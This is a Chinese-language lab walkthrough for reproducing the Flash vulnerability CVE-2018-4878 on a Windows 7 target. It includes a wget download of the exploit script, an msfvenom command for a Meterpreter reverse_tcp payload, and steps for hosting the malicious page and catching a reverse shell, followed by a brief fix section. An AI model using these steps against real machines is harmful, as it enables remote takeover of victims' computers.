一、前言介紹
2018年2月1號,Adobe官方發布安全通報(APSA18-01),宣告Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878),
從Adobe公告來看,這個漏洞的野外攻擊樣本最早是由韓國計算機應急回應小組(KRCERT)發現的,而KR-CERT也表示,來自朝鮮的黑客組織已經成功利用這個0Day 漏洞發 起攻擊,
攻擊者通過構造特殊的Flash鏈接,當用戶用瀏覽器/郵件/Office訪問此Flash鏈接時,會 被“遠程代碼執行”,并且直接被getshell,
二、本文測驗環境
攻擊機:kali IP:192.168.44.128
靶機:windows7 IP:192.168.44.140+IE8+FLASH Player28.0.0.137(及以前版本)
1、下載CVE-2018-4878利用腳本到kali機 wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018- 4878.rar
2、解壓后如下圖,可看到cve-2018-4878.py,exploit.swf 其實之后我們還是要自己生成一個index2.html的

3、Windows7 安裝flash插件

三、漏洞復現
1、先在kali里面把cve-2018-4878.py的stageless = True修改成False

2、使用msf生成shell代碼
msfvenom -p windows/meterpreter/reverse_tcp lhost=your host lport=your port -f python>shellcode.txt
其中:lhost為kali的ip地址,lport為監聽的埠

查看生成的shellcode.txt

3、將生成的shellcode.txt的內容更換到cve-2018-4878.py的shellcode

4、在kali下執行cve-2018-4878.py,注意要和index2.html,在同一個檔案夾下

5、在kali里面開啟Apache2服務,并將兩個檔案放到/var/www/html目錄(apache web路徑)


現在,kali上的web服務已經啟動,并且已經有了index2.html這個web頁面,我們需要用靶機win7訪問這個頁面
6、kali上開啟shell會話監聽
進入msf,使用handler監聽模塊

回彈一個tcp連接

設定kali的ip,監聽的埠號

啟動服務

7、使用win7靶機的已開啟flash服務的瀏覽器進行訪問index2.html

8、回到kali,已經進入meterpreter模塊

9、當靶機訪問惡意的index2.html頁面,即可觸發反彈shell

四、漏洞修復
將flash通過官網升級到最新版本
https://www.flash.cn/
或者,關閉flash的使用
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/16210.html
標籤:其他
